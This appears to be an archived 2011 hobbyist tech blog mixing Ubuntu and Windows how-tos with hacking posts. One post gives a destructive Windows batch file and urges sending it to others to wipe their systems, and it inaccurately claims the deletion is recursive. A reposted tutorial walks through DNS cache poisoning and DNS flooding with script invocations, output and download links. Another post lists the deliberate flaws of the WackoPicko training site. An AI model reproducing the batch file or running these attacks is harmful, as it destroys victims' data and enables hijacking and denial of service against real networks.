Sunday 29 May 2011

Download Scribd.com PDFs Without Any Account

Earlier today, I had to download a PDF document from scribd.com, but I didn't have a scribd.com account, so I coded a script that helps me download PDFs from scribd.com without any account.

To access the service, visit this link.




It will ask you for the URL of the PDF document. Just copy and paste the URL from the address bar while you are viewing the PDF on scribd.com.

I hope this becomes useful for you sometime. :)

Note: Many people have emailed me that the tool is not working. In fact, scribd has changed the way documents are downloaded. Once I find the new bypassing method, I'll redo the script.



Fix GPG Key Errors For Bad Keys

Today I tried to update my Ubuntu 10.10, but unfortunately I got an error regarding the GPG keys saying the signature could not be verified. A simple solution for this is presented in this post.

The error I got was as below:

W: GPG error: http://ppa.launchpad.net maverick Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 5A9A06AEF9CB8DB0

My solution was to fetch the key using the same hex key ID shown in the error.

sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 5A9A06AEF9CB8DB0

This simply worked like a charm. I hope this works for you as well. :)
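When several PPAs are missing keys at once, it is handy to pull every NO_PUBKEY ID out of the apt output instead of copying them by hand. This is an added example of mine (not from the post); it works on a constructed apt-get update transcript that reuses the warning above plus a placeholder key ID, and it also flags BADSIG lines, which fetching keys does not fix.

```python
import re

# Constructed sample of `apt-get update` output: the warning from the post,
# a duplicate of it, and a second key whose ID is a made-up placeholder.
SAMPLE_APT_OUTPUT = """\
Hit http://archive.ubuntu.com maverick Release.gpg
W: GPG error: http://ppa.launchpad.net maverick Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 5A9A06AEF9CB8DB0
W: GPG error: http://ppa.launchpad.net maverick Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 5A9A06AEF9CB8DB0
W: GPG error: http://ppa.launchpad.net maverick Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 0123456789ABCDEF
"""

# apt prints the 64-bit (16 hex digit) key ID after NO_PUBKEY
NO_PUBKEY_RE = re.compile(r"\bNO_PUBKEY ([0-9A-Fa-f]{16})\b")
# BADSIG means the key is already present but the Release file's signature
# does not verify; --recv-keys will not help and the repo deserves a closer look
BADSIG_RE = re.compile(r"\bBADSIG ([0-9A-Fa-f]{16})\b")


def gpg_error_lines(apt_output):
    """Only the GPG warning lines, so unrelated output cannot match."""
    return [line for line in apt_output.splitlines() if line.startswith("W: GPG error:")]


def missing_key_ids(apt_output):
    """Distinct key IDs reported as NO_PUBKEY, upper-cased, in order of first appearance."""
    seen = []
    for line in gpg_error_lines(apt_output):
        for key_id in NO_PUBKEY_RE.findall(line):
            key_id = key_id.upper()
            if key_id not in seen:
                seen.append(key_id)
    return seen


def bad_signature_key_ids(apt_output):
    """Key IDs whose signature failed outright (BADSIG); not fixable by fetching keys."""
    return sorted({k.upper() for line in gpg_error_lines(apt_output)
                   for k in BADSIG_RE.findall(line)})


def recv_key_commands(apt_output, keyserver="keyserver.ubuntu.com"):
    """The command from the post, generated once per missing key."""
    return ["sudo apt-key adv --keyserver %s --recv-keys %s" % (keyserver, key_id)
            for key_id in missing_key_ids(apt_output)]


if __name__ == "__main__":
    for cmd in recv_key_commands(SAMPLE_APT_OUTPUT):
        print(cmd)
    for key_id in bad_signature_key_ids(SAMPLE_APT_OUTPUT):
        print("BADSIG for %s: do not just re-fetch, check the repository" % key_id)
```

Fetching by ID only retrieves whatever the keyserver holds under that ID; before relying on it, compare the full fingerprint shown by `apt-key finger` with the one published on the PPA's Launchpad page.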


Saturday 28 May 2011

Kill Windows System With Batch File

This is a very useful two-line piece of code that can be pretty dangerous if executed, especially if run with higher privileges in the Windows OS (works well on XP, not tested on other Windows versions).

Open Notepad and type the following lines of code:
del /f /q *
erase C:WINDOWS

The above lines of code delete everything recursively without asking for any confirmation.

If you want to delete a certain folder entirely (C:\windows in this example), type the following line of code in Notepad:

erase c:windows

Now save the file as filename.bat and send it to your friends or anyone whose system you want to kill. On clicking this batch file, very bad things are gonna happen. So be warned not to click it when the file is on your system.


Attacking the DNS System Tutorial

This tutorial was written by mango1122 from governmentsecurity. Since it's very informative, I have decided to post this tutorial over here.

--------------
INTRODUCTION
--------------

Domain Name System (DNS) associates various sorts of information with so-called domain names; most importantly, it serves as the "phone book" for the Internet: it translates human-readable computer hostnames, e.g. en.wikipedia.org, into the IP addresses that networking equipment needs for delivering information. It also stores other information such as the list of mail exchange servers that accept email for a given domain.

The Berkeley Internet Name Service (BIND) is the most common form of DNS server used on the Internet. BIND typically runs on UNIX-type systems. The DNS server stores information which it serves out about a particular domain (also referred to as a namespace) in text files called zone files. A client (the resolver) maintains a small amount of local cache which it will refer to first before looking at a local static hosts file and then finally the DNS server. The result returned will then be cached by the client for a small period of time.

When a DNS server is contacted for a resolution query, and if it is authoritative (has the answer to the question in its own database) for a particular domain (referred to as a zone) it will return the answer to the client. If it is not authoritative for the domain, the DNS server will contact other name servers and eventually it will get the answer it needs which is passed back to the client. This process is known as recursion.

Additionally the client itself can attempt to contact additional DNS servers to resolve a name. When a client does so, it uses separate and additional queries based on referral answers from servers. This process is known as iteration.


----------------------------
ATTACKING THE DNS CACHE
----------------------------

The most common attacks on DNS can be classified as

Zone Transfers or information disclosure attacks
Cache poisoning


CACHE POISONING

Let's say a client in domain xyz.com wants to resolve www.google.com.

1. The client will contact its configured DNS server and ask for www.google.com to be resolved. This query will contain information about the client's source UDP port, IP address and a DNS transaction ID.

2. If the information is available locally, i.e. cached, it is returned to the client.

3. If not, then the client's DNS server will contact the authoritative name server for google.com and resolve the query.

4. The answer is passed back to the client and also cached locally in the DNS server of xyz.com (say ns1.xyz.com) and the client.

5. Note the client only accepts the DNS information if the server replies with the correct client's source UDP port, IP address and the DNS transaction ID.




--------------------------------
Attack #1 - The Birthday Attack
--------------------------------

To poison the cache the attacker needs to

1. Send a number of resolution requests for google.com. An important thing to note here is that each query for google.com is assigned a different transaction ID.

2. While the DNS resolves this the attacker sends a large number of spoofed replies from ns1.google.com with different transaction IDs. The attacker hopes to guess the correct transaction ID as used by the two name servers.

Finding the correct IP addresses is easy; we know our target, and we know the addresses of the legitimate nameservers for the domain to be hijacked. Finding the port is slightly harder. We know that the destination port of the recursive query is UDP port 53, but the source port is a moving target. Fortunately for our attacker, BIND will more often than not reuse the same source port for queries on behalf of the same client. So, if the attacker is working from an authoritative nameserver, he can first issue a request for a DNS lookup of a hostname on his server. When the recursive query packet arrives, he can look at the source port. Chances are this will be the same source port used when the victim sends the queries for the domain to be hijacked.


--------------------------------
Attack #2 - Poisoning the Cache
--------------------------------

1. To obtain the source port we use a perl script. It needs to be run from an authoritative name server which the attacker controls to query the target name server for a hostname for which the attacker's machine is authoritative.

Another alternative would be to use a packet sniffer.

dns1.pl 10.10.10.50 www.google.com
source port: 34567

2. Now we run the second script, written by Ramon Izaguirre, called hds0.pl2. The script does most of the work by spoofing the reply from ns1.google.com.

./hds0.pl (ns1.google.com) (ns1.xyz.com) (source port obtained from the earlier script) (spoof target)


To observe if the attack was successful simply query the target name server:

dig @12.12.12.12 www.google.com
www.google.com 86400 IN A 10.10.10.10

The attack is successful as google resolves to 10.10.10.10.

The script is available here - hxxp://securityvulns.com/files/birthday.pl


--------------------------------------
Attack #3 - DOS Attack on DNS servers
--------------------------------------

DNS servers like other Internet resources are prone to denial of service attacks. The only difference here would be that the DNS server uses UDP for name resolution. To create a DOS attack on the DNS server a script such as dnsflood.pl can be executed on multiple clients to create the traffic. DNSflood works by sending many thousands of rapid DNS requests, thereby giving the server more traffic than it can handle, resulting in slower and slower response times for legitimate requests.

The script can be obtained from - hxxp://packetstormsecurity.org/DoS/dnsflood.pl

In the following example we use the script to create a DOS effect on the DNS server and then query the DNS for name resolution.

perl dnsflood.pl 192.168.10.1
attacked: 192.168.10.1...

To assess the impact of this attack on performance the attacker from another machine first clears his local cache and then queries the target name server. Clearing the local cache will ensure the resolver gets the information from the server and not locally.


C:\>ipconfig /flushdns
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.

C:\>nslookup
DNS request timed out.
timeout was 2 seconds.
*** Can't find server name for address 192.168.10.1: Timed out
*** Default servers are not available
Default Server: UnKnown
Address: 192.168.10.1

> ms2.xyz.com
Server: UnKnown
Address: 192.168.10.1

DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to UnKnown timed-out

>exit

If this attack was multiplied from a number of machines then the impact would be even greater.


------------
CONCLUSION
------------

These are only a few possible exploits involving the DNS Spoofing vulnerability and there are, probably, many more waiting to be discovered. Discovery and implementation is limited only by the active imagination of the attacker.
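As an added illustration (example code of mine, not part of mango1122's tutorial), here are the numbers behind Attack #1: how likely a flood of forged replies is to hit one of the outstanding 16-bit transaction IDs, and how far the odds fall once the resolver randomizes its source port as well, which is the defence resolvers later adopted for exactly this reason. It assumes, as the tutorial does, that the attacker already knows the addresses and the source port, so only the ID (or ID plus port) has to be guessed.

```python
import math

TXID_SPACE = 1 << 16           # 16-bit DNS transaction ID
TXID_AND_PORT_SPACE = 1 << 32  # roughly, once the 16-bit source port is random too


def poison_probability(outstanding_queries, spoofed_replies, space):
    """Exact probability that at least one of `spoofed_replies` distinct guesses
    matches one of `outstanding_queries` distinct in-flight values, both drawn
    uniformly from `space` possibilities.

    Models Attack #1: n queries for the same name are in flight (each with its
    own transaction ID) while m forged replies with different IDs are sent; any
    match that beats the real answer gets cached."""
    n, m = outstanding_queries, spoofed_replies
    if n <= 0 or m <= 0:
        return 0.0
    if n + m > space:
        return 1.0  # pigeonhole: a collision is certain
    # P(no match) = C(space-n, m) / C(space, m) = prod_{i<m} (space-n-i)/(space-i),
    # accumulated in log space to avoid underflow for large m
    log_no_match = 0.0
    for i in range(m):
        log_no_match += math.log(space - n - i) - math.log(space - i)
    return 1.0 - math.exp(log_no_match)


def replies_needed(outstanding_queries, space, target=0.5):
    """Forged replies needed for a `target` chance of success against
    `outstanding_queries` in-flight queries, from P ~ 1 - exp(-n*m/space)."""
    return math.ceil(-space * math.log(1.0 - target) / outstanding_queries)


def birthday_pairs_needed(space, target=0.5):
    """The birthday variant: equally many queries and forged replies (n == m)."""
    return math.ceil(math.sqrt(-space * math.log(1.0 - target)))


if __name__ == "__main__":
    for n in (1, 50, 300):
        print("n=m=%d, TXID only:       P=%.4f" % (n, poison_probability(n, n, TXID_SPACE)))
        print("n=m=%d, TXID+random port: P=%.6f" % (n, poison_probability(n, n, TXID_AND_PORT_SPACE)))
    print("50%% with TXID only:       n=m=%d" % birthday_pairs_needed(TXID_SPACE))
    print("50%% with TXID+random port: n=m=%d" % birthday_pairs_needed(TXID_AND_PORT_SPACE))
```

A few hundred queries and replies give better-than-even odds against a fixed source port, while the same flood against a randomized port is a sub-0.01% shot, which is why port reuse in the tutorial matters more than the ID itself.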


Fixing No Init Found. Try Passing Init: Bootarg Error in Ubuntu

Today I encountered this error and thought it was related to HDD issues, so I used fsck, which is a command line tool to check and repair Linux filesystems. I am writing this short how-to so that it might be helpful for you as well.

The error encountered is something like below:

mount: mounting /dev on /root/dev failed: No such file or directory
mount: mounting /sys on /root/sys failed: No such file or directory
mount: mounting /proc on /root/proc failed: No such file or directory
Target file system doesn't have requested /sbin/init
No init found. Try passing init: bootarg

You need to boot your system with the Ubuntu live CD. After booting from live CD, open the terminal and then enter the following command:

sudo fsck /dev/sda1

Replace /dev/sda1 with your target filesystem partition and press enter. Whenever it asks for permission to fix or overwrite something, press y. After the repair finishes, reboot your system from the hard disk. The system should boot without any error now.
I hope this helps you. :)


How To Change Default Location of Program Files Folder[Registry]

By default, any Windows program is installed in the [System Drive]/Program Files directory, and if you want to change this setting, a simple registry hack is enough.

First open the registry editor by typing regedit in your run command. Then navigate to the following key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

From there, change the value of "ProgramFiles" or "ProgramFilesDir" as per your need. I hope this helps. :)


Etherchange : Command Line Tool To Change MAC Address

I've already discussed how to change the MAC address of your Ethernet card under Windows as well as Linux. One more such tool, this time a command line tool, is EtherChange.

EtherChange can change the Ethernet address of the network adapters in Windows.

Usage instructions

Download the exe file and run it from a Command Prompt. It will give you the instructions you need. EtherChange only works if your account is in the Administrators group.

Download link: EtherChange


Friday 27 May 2011

Download Books From Google Books Using A GreaseMonkey Script

Do you want to download the undownloadable books from Google Books? If yes, here's the solution for you.

Google Book Downloader is a Greasemonkey script that works in Firefox with the Greasemonkey add-on. Greasemonkey is a very useful Firefox add-on used to manipulate web pages with JavaScript.

For more details on the script and how to use it, refer to the official site.

The script is available at userscripts.org collection.

I hope this is useful.


Tuesday 24 May 2011

Remove Warnings & Notices From Psychostats

I was testing the Psychostats script today and while testing I found that it displayed lots of warnings and notices that make the script look so bad, as the output is totally messed up. This post will help you fix this problem.

At first, I tried to change the error_reporting and display_errors settings in the php.ini file, but I could not get rid of those errors. So I then put the line of code below at the top of the index.php file of Psychostats. Still no luck. Finally, I navigated to ./includes relative to the Psychostats root folder, where there was a file named class_PS.php. Open this file and type the following line below the <?php line.

error_reporting(0);

This will suppress all those errors and make your Psychostats look better. I hope this helps.


Fix Counter Strike Sound Problem Under WINE [How To]

I've been playing Counter-Strike for a while through WINE and so far, most of it works well. As I got better at the game, I learnt the importance of sound in it. Unfortunately, the sound was not working properly and with some experiments, I've found the solution for me. I hope it also works for you.

By default, my WINE audio is configured to use the ALSA driver with the settings as below:


Now, you need to edit the settings to match as in the following image.


After changing the audio configuration, click on Apply and then restart Counter-Strike. I guess this will work for you as well.


Friday 20 May 2011

Converting VMWare .vmdk to Virtualbox .vdi

I was downloading Metasploitable to play around with it and found that it was a VMWare .vmdk file, so I had to convert it into a .vdi file to run under VirtualBox. This post will show you how to easily convert a .vmdk file into a .vdi file.

Converting the VMWare disk file to the VirtualBox HDD file is not a difficult task, but still many might not know how to do it. In order to convert your .vmdk file to .vdi, first change the terminal to the proper directory and then type the following command:


VBoxManage clonehd --format VDI metasploitable.vmdk metasploitable.vdi


Note that you need to have VirtualBox installed for this to work. I hope this helps. :)


Saturday 14 May 2011

Get High Compression Ratio With KGBArchiver

So you are wondering how you could compress your 2 GB of game data into less than 100 MB? Are you lacking hard disk space and want to store files in compressed form? If yes, then this post will direct you towards the solution.

KGB Archiver is a compression tool with an unbelievably high compression rate. It surpasses even such efficient compression tools as 7zip and UHARC in terms of its abilities. KGB Archiver uses AES-256 encryption to encrypt archives. While the compression ratio is very high, it requires a relatively high PC specification and it also requires more time to compress and decompress files. But still this compression program will come in useful sometimes.

For more information and download, visit KGB Archiver's SourceForge page.



Friday 13 May 2011

Physical Memory Acquisition With MDD

MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.

This tool can be pretty useful for analyzing the data present in RAM. Whenever we are running programs, RAM stores a wide range of information being used by the program. For example, if we are running a web browser, the RAM may contain the URLs being visited, form data, etc. So you can guess that we can extract a lot of information from RAM. Thus, MDD can be a very useful tool to dump the physical memory into a file from which we can extract the required information.

You can read more and download the tool from MDD SourceForge Page.


Tuesday 10 May 2011

Reset Forgotten Ubuntu Password [How To]

If you've forgotten your Ubuntu user password, it is still possible to recover the account by resetting the password. The recovery mode option in the GRUB menu can be used to reset the Ubuntu user password, as this mode lets us drop to a root shell prompt.

To reset the password, first select recovery mode from the GRUB menu. Then you'll have to select the "Drop to shell prompt" option. Now you can simply reset your password using the passwd command.

passwd <yourusername>

Replace the yourusername field with your Ubuntu login username and you'll be prompted twice for the new password. Enter the new password and you're done. Just reboot the system; the password is now reset and you'll be able to access your Ubuntu account. I hope this helps. :)


Learn Web Hacking With WackoPicko

WackoPicko is a website that contains known vulnerabilities. It can be a very efficient way to master web hacking skills. This project is similar to Damn Vulnerable Web Application and is a collection of common web vulnerabilities.

For more information and downloads, you can check the WackoPicko GitHub page.

Vulnerabilities

Reflected XSS
http://localhost/pictures/search.php?query=blah
The query parameter is vulnerable.

Stored XSS
http://localhost/guestbook.php
The comment field is vulnerable.

SessionID vulnerability
http://localhost/admin/login.php
The session cookie value is admin_session, which is an auto-incrementing value.

Stored SQL Injection
http://localhost/users/register.php -> http://localhost/users/similar.php
The first name field of the register users form contains a stored SQL injection which is then used unsanitized on the similar users page.

Reflected SQL Injection
http://localhost/users/login.php
The username field is vulnerable.

Directory Traversal
http://localhost/pictures/upload.php
The tag field has a directory traversal vulnerability enabling a malicious user to overwrite any file the web server user has access to.

Multi-Step Stored XSS
http://localhost/pictures/view.php?picid=3
The comment field is vulnerable to XSS, however must go through a preview form.

Forceful Browsing
http://localhost/pictures/highquality.php?picid=3&key=highquality
The user doesn't have to purchase the picture to see the high quality version.

Command-line Injection
http://localhost/passcheck.php
The password field is vulnerable to a command line injection.

File Inclusion
http://localhost/admin/index.php?page=login
The page is vulnerable to a file inclusion vulnerability, however you have to include at the end.

Parameter Manipulation
http://localhost/users/sample.php?userid=1
The userid parameter can be manipulated to see any user's page when you need to be logged in otherwise.

Reflected XSS Behind JavaScript
http://localhost/piccheck.php
The name parameter is vulnerable.

Logic Flaw
http://localhost/cart/review.php
A coupon can be applied multiple times reducing the price of an order to zero. The coupon in the initial data is SUPERYOU21.

Reflected XSS Behind a Flash Form
http://localhost/submitname.php
The value parameter is vulnerable.

Weak username/password
https://localhost/admin/login.php
There is a default username/password combination of admin/admin.



Phatch : Batch photo processing GUI tool

Phatch (Photo + Batch) is a user-friendly, cross-platform Photo Batch Processor and Exif Renamer with a nice graphical user interface. Phatch handles all popular image formats and can duplicate (sub)folder hierarchies. Phatch can batch resize, rotate, apply shadows, perspective, rounded corners, … and perform many more actions in minutes instead of the hours or days it would take to do it manually.

For more information on Phatch, you can visit HERE.

Overview

Actions: resize, rotate, invert, flip, watermark, shadow, rounded corners and much more!
Drag & drop of actions
Enable & disable actions
Can copy folder hierarchies
Python shell
Error logging
File history
Console (can run on servers without gui)
Desktop droplets
Image Inspector (exif & iptc)
Cross-platform (Linux, Windows & Mac)
python-api

File formats

Phatch supports the same file formats as PIL…

Read & write: 'bmp','dib','gif','jpe','jpeg','jpg','im','msp', 'pcx','png','pbm','pgm','ppm','tif','tiff','xbm'
Read only: 'cur','dcx','fli','flc','fpx', 'gbr','gd','ico','imt','mic','mcidas','pcd', 'psd','bw','rgb','cmyk','sun','tga','xpm'
Write only: 'eps','ps','pdf'

Color support

Phatch supports these color modes:

Monochrome (1-bit pixels, black and white)
Grayscale (8-bit pixels, black and white)
RGB (3x8-bit pixels, true colour)
RGBA (4x8-bit pixels, RGB with transparency mask)
CMYK (4x8-bit pixels, colour separation)
P (8-bit pixels, mapped using a colour palette)
YCbCr (3x8-bit pixels, colour video format)
I (32-bit integer pixels)
F (32-bit floating point pixels)


To install phatch under ubuntu, type the following in terminal:

sudo apt-get install phatch


Saturday 7 May 2011

GPRS Setting For Nepal Telecom

Nepal Telecom is providing GPRS service in both its pre-paid and post-paid services. I am posting the general settings to use the GPRS service of Nepal Telecom.

Basic Setting Parameters for GPRS & MMS

Proxy Server :- 192.80.7.133, Port :- 8000

For accessing internet/WAP through your mobile handset :-
GPRS Access Point Name(APN) :- ntwap

For accessing internet through computer by using GPRS service in your mobile phone :-
APN :- ntnet

For sending and receiving MMS :-
MMS APN :- ntmms
MMS Home Page/Server Address :- 192.80.11.180


HTML Parser For Blogs

I've written a small code snippet that works as an HTML parser for use in your blogs. It can be useful for putting Google AdSense code and source code in your blog posts. Obviously it might have other uses, but I am using it for posting source code.

The parser can be accessed from the URL below:

www.nepali.netau.net/parser

Thanks.


Graphical Tools To Determine PCI Devices In Linux

We can use the lspci command to list and identify PCI devices from the terminal, but most of us want a graphical way to view the PCI devices connected to our system. In this post, we will discuss two such GUI tools.

1. GNOME Device Manager
This is a GNOME program to manage devices and device drivers. It's inspired by hal-device-manager from the HAL project, but rewritten in C for efficiency and with a view to actually making it manage devices rather than just show information.

To install it, type the following apt-get command:

sudo apt-get install gnome-device-manager

You can open the program from Applications -> System Tools -> Device Manager


2. Hardinfo
HardInfo is a small system profiler and benchmark application that displays information about your hardware and operating system. Currently it knows about PCI, ISA PnP, USB, IDE, SCSI, Serial and parallel port devices.

To install hardinfo, type the following in your terminal:

sudo apt-get install hardinfo

You can open the program from Applications -> System Tools -> System Profiler and Benchmark


If you know any other such GUI tool, please do comment.
